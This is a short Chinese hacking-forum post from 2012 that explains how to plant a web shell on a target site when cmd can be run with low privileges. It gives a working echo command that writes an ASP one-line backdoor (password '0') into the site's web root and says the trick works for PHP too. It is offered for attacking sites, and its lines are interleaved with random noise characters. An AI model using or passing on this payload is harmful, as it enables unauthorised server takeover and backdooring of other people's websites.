在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。 a1 O' m8 W' ]5 ^) j: d4 l& Q
+ i% r0 `- l4 f. l! Z7 H命令格式
% R( O, ~9 t& M S
* `* K+ S9 v, v1 j$ c3 i0 G1 VEcho 语句 >目标站绝对目录( R& [6 Z6 z! z
" o# m! m, v3 N: y2 U: y+ T u6 N r
例如: ) d7 P2 w$ r0 j5 p2 t% m V
" o% g7 O6 L pecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
6 b, h9 n$ t. m
" h: j S2 ~% h/ s+ f2 _6 g( q这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。" k$ [7 \! a5 Y: g
|
发表于 2012-9-23 14:40:24
收藏
支持
反对